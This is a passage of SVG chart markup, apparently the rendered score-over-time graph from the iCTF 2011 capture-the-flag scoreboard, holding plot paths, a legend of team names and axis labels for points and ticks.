stroke-width="0.000001"></path><path d="M 280.5 239.82 L 276.5 231.82 284.5 231.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 278.5 241.32 L 274.5 233.32 282.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 276.5 243.32 L 272.5 235.32 280.5 235.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 244.82 L 270.5 236.82 278.5 236.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 272.5 245.32 L 268.5 237.32 276.5 237.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 270.5 245.82 L 266.5 237.82 274.5 237.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 248.82 L 264.5 240.82 272.5 240.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 248.82 L 262.5 240.82 270.5 240.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 264.5 250.32 L 260.5 242.32 268.5 242.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 262.5 251.32 L 258.5 243.32 266.5 243.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 252.82 L 256.5 244.82 264.5 244.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 259 254.32 L 255 246.32 263 246.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 257 254.82 L 253 246.82 261 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 255 254.82 L 251 246.82 259 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 253 254.82 L 249 246.82 257 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 251 254.82 L 247 246.82 255 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 249 254.82 L 245 246.82 253 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 247 254.82 L 243 246.82 251 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 245 254.82 L 241 246.82 249 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 243 254.82 L 239 246.82 247 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 241 254.82 L 237 246.82 245 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 239 254.82 L 235 246.82 243 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 237 254.82 L 233 246.82 241 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 235 254.82 L 231 246.82 239 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 233 254.82 L 229 246.82 237 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 231 254.82 L 227 246.82 235 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 229 254.82 L 225 246.82 233 246.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 227 255.32 L 223 247.32 231 247.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 225 255.32 L 221 247.32 229 247.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 223 255.82 L 219 247.82 227 247.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 221 256.32 L 217 248.32 225 248.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 256.32 L 215.5 248.32 223.5 248.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 217.5 256.32 L 213.5 248.32 221.5 248.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 215.5 256.32 L 211.5 248.32 219.5 248.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 256.32 L 209.5 248.32 217.5 248.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 256.32 L 207.5 248.32 215.5 248.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 209.5 256.32 L 205.5 248.32 213.5 248.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 207.5 256.32 L 203.5 248.32 211.5 248.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 256.32 L 201.5 248.32 209.5 248.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 203.5 256.32 L 199.5 248.32 207.5 248.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 201.5 257.82 L 197.5 249.82 205.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 257.82 L 195.5 249.82 203.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 197.5 257.82 L 193.5 249.82 201.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 195.5 257.82 L 191.5 249.82 199.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 257.82 L 189.5 249.82 197.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 191.5 257.82 L 187.5 249.82 195.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 189.5 257.82 L 185.5 249.82 193.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 257.82 L 183.5 249.82 191.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 257.82 L 181.5 249.82 189.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 183.5 257.82 L 179.5 249.82 187.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 181.5 257.82 L 177.5 249.82 185.5 249.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 258.32 L 175.5 250.32 183.5 250.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 178 258.32 L 174 250.32 182 250.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 176 258.82 L 172 250.82 180 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 174 258.82 L 170 250.82 178 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 172 258.82 L 168 250.82 176 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 170 258.82 L 166 250.82 174 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 168 258.82 L 164 250.82 172 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 166 258.82 L 162 250.82 170 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 164 258.82 L 160 250.82 168 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 162 258.82 L 158 250.82 166 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 160 258.82 L 156 250.82 164 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 158 258.82 L 154 250.82 162 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 156 258.82 L 152 250.82 160 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 154 258.82 L 150 250.82 158 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 152 258.82 L 148 250.82 156 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 150 258.82 L 146 250.82 154 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 148 258.82 L 144 250.82 152 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 146 258.82 L 142 250.82 150 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 144 258.82 L 140 250.82 148 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 142 258.82 L 138 250.82 146 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 140 258.82 L 136 250.82 144 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 258.82 L 134.5 250.82 142.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 136.5 258.82 L 132.5 250.82 140.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 134.5 258.82 L 130.5 250.82 138.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 258.82 L 128.5 250.82 136.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 258.82 L 126.5 250.82 134.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 128.5 258.82 L 124.5 250.82 132.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 126.5 258.82 L 122.5 250.82 130.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 258.82 L 120.5 250.82 128.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 122.5 258.82 L 118.5 250.82 126.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 120.5 258.82 L 116.5 250.82 124.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 258.82 L 114.5 250.82 122.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 116.5 258.82 L 112.5 250.82 120.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 114.5 258.82 L 110.5 250.82 118.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 258.82 L 108.5 250.82 116.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 110.5 258.82 L 106.5 250.82 114.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 108.5 258.82 L 104.5 250.82 112.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 258.82 L 102.5 250.82 110.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 104.5 258.82 L 100.5 250.82 108.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 102.5 258.82 L 98.5 250.82 106.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 100.5 258.82 L 96.5 250.82 104.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 258.82 L 94.5 250.82 102.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 97 258.82 L 93 250.82 101 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 95 258.82 L 91 250.82 99 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 93 258.82 L 89 250.82 97 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 91 258.82 L 87 250.82 95 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 89 258.82 L 85 250.82 93 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 87 258.82 L 83 250.82 91 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 85 258.82 L 81 250.82 89 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 83 258.82 L 79 250.82 87 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 81 258.82 L 77 250.82 85 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 79 258.82 L 75 250.82 83 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 77 258.82 L 73 250.82 81 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 75 258.82 L 71 250.82 79 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 73 258.82 L 69 250.82 77 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 71 258.82 L 67 250.82 75 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 69 258.82 L 65 250.82 73 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 67 258.82 L 63 250.82 71 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 65 258.82 L 61 250.82 69 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 63 258.82 L 59 250.82 67 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 61 258.82 L 57 250.82 65 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 59 258.82 L 55 250.82 63 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 258.82 L 53.5 250.82 61.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 55.5 258.82 L 51.5 250.82 59.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 53.5 258.82 L 49.5 250.82 57.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 258.82 L 47.5 250.82 55.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 49.5 258.82 L 45.5 250.82 53.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 47.5 258.82 L 43.5 250.82 51.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 45.5 258.82 L 41.5 250.82 49.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 258.82 L 39.5 250.82 47.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 41.5 258.82 L 37.5 250.82 45.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 39.5 258.82 L 35.5 250.82 43.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 258.82 L 33.5 250.82 41.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 35.5 258.82 L 31.5 250.82 39.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 33.5 258.82 L 29.5 250.82 37.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 258.82 L 27.5 250.82 35.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 29.5 258.82 L 25.5 250.82 33.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 27.5 258.82 L 23.5 250.82 31.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 258.82 L 21.5 250.82 29.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 23.5 258.82 L 19.5 250.82 27.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 21.5 258.82 L 17.5 250.82 25.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 19.5 258.82 L 15.5 250.82 23.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 258.82 L 13.5 250.82 21.5 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 16 258.82 L 12 250.82 20 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 14 258.82 L 10 250.82 18 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 12 258.82 L 8 250.82 16 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 10 258.82 L 6 250.82 14 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 8 258.82 L 4 250.82 12 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 6 258.82 L 2 250.82 10 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 4 258.82 L 0 250.82 8 250.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path></g></g><g class="highcharts-legend" zIndex="7" transform="translate(484,110)"><text x="30" y="18" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">More Smoked Leet Chicken</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#DDDF0D" transform="translate(30,14)"></path><text x="30" y="33" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">CISSP Groupies</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#7798BF" transform="translate(30,29)"></path><text x="30" y="48" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">We_0wn_Y0u</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#55BF3B" transform="translate(30,44)"></path><text x="30" y="63" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">FAUST</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#DF5353" transform="translate(30,59)"></path><text x="30" y="78" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">ENOFLAG</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#aaeeee" transform="translate(30,74)"></path><text x="30" y="93" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">Chocolate Makers</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#ff0066" transform="translate(30,89)"></path><text x="30" y="108" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">Pwnies</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#eeaaee" transform="translate(30,104)"></path><text x="30" y="123" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">Brooklynt Overflow</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#55BF3B" transform="translate(30,119)"></path><text x="30" y="138" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">Magic Hat</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#DF5353" transform="translate(30,134)"></path><text x="30" y="153" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">ufologists</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#7798BF" transform="translate(30,149)"></path><circle cx="17" cy="14" r="4" zIndex="3" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><path d="M 17 25 L 21 29 17 33 13 29 Z" fill="#7798BF" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 14.172 41.172 L 19.828 41.172 19.828 46.828 14.172 46.828 Z" fill="#55BF3B" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 17 53.68 L 21 61.68 13 61.68 Z" fill="#DF5353" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 17 79.32 L 13 71.32 21 71.32 Z" fill="#aaeeee" zIndex="3" stroke="#333" stroke-width="0.000001"></path><circle cx="17" cy="89" r="4" zIndex="3" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><path d="M 17 100 L 21 104 17 108 13 104 Z" fill="#eeaaee" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 14.172 116.172 L 19.828 116.172 19.828 121.828 14.172 121.828 Z" fill="#55BF3B" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 17 128.68 L 21 136.68 13 136.68 Z" fill="#DF5353" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 17 154.32 L 13 146.32 21 146.32 Z" fill="#7798BF" zIndex="3" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-axis" zIndex="7"><text x="78.91176470588235" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="78.91176470588235">0</tspan></text><text x="128.30273321449792" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="128.30273321449792">25</tspan></text><text x="177.6937017231135" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="177.6937017231135">50</tspan></text><text x="227.0846702317291" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="227.0846702317291">75</tspan></text><text x="276.47563874034466" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="276.47563874034466">100</tspan></text><text x="325.86660724896024" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="325.86660724896024">125</tspan></text><text x="375.25757575757575" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="375.25757575757575">150</tspan></text><text x="424.6485442661913" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="424.6485442661913">175</tspan></text><path d="M 79.5 351 L 79.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 128.5 351 L 128.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 178.5 351 L 178.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 227.5 351 L 227.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 276.5 351 L 276.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 326.5 351 L 326.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 375.5 351 L 375.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 425.5 351 L 425.5 356" fill="none" stroke="#999" stroke-width="1"></path></g><text x="274.5" y="382" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;color:#AAA;font-weight:bold;font:bold 12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif;fill:#AAA;" zIndex="7" text-anchor="middle"><tspan x="274.5">Ticks</tspan></text><g class="highcharts-axis" zIndex="7"><text x="67" y="356.6" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">-250</tspan></text><text x="67" y="314.31428571428575" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">0</tspan></text><text x="67" y="272.02857142857147" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">250</tspan></text><text x="67" y="229.7428571428571" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">500</tspan></text><text x="67" y="187.45714285714286" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">750</tspan></text><text x="67" y="145.17142857142855" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">1,000</tspan></text><text x="67" y="102.88571428571427" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">1,250</tspan></text><text x="67" y="60.6" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">1,500</tspan></text></g><text x="25" y="203" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;color:#AAA;font-weight:bold;font:bold 12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif;fill:#AAA;" zIndex="7" transform="rotate(270 25 203)" text-anchor="middle"><tspan x="25">Points</tspan></text><path d="M 75 351.5 L 474 351.5" fill="none" stroke="#999" stroke-width="1" zIndex="7"></path><g class="highcharts-tooltip" zIndex="8" visibility="hidden"><rect rx="5" ry="5" fill="none" x="5" y="5" width="0" height="0" stroke-width="5" isShadow="true" stroke="rgb(0, 0, 0)" stroke-opacity="0.05" transform="translate(1,1)"></rect><rect rx="5" ry="5" fill="none" x="5" y="5" width="0" height="0" stroke-width="3" isShadow="true" stroke="rgb(0, 0, 0)" stroke-opacity="0.1" transform="translate(1,1)"></rect><rect rx="5" ry="5" fill="none" x="5" y="5" width="0" height="0" stroke-width="1" isShadow="true" stroke="rgb(0, 0, 0)" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></rect><rect rx="5" ry="5" fill="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-181)" x="5" y="5" width="0" height="0" stroke-width="0.000001"></rect><text x="10" y="22" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;color:#FFF;padding:0;white-space:nowrap;fill:#FFF;" zIndex="1"><tspan x="10"> </tspan></text></g><g class="highcharts-tracker" zIndex="9" transform="translate(75,55)"><path d="M -6.088235294117647 253.71428571428572 L 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 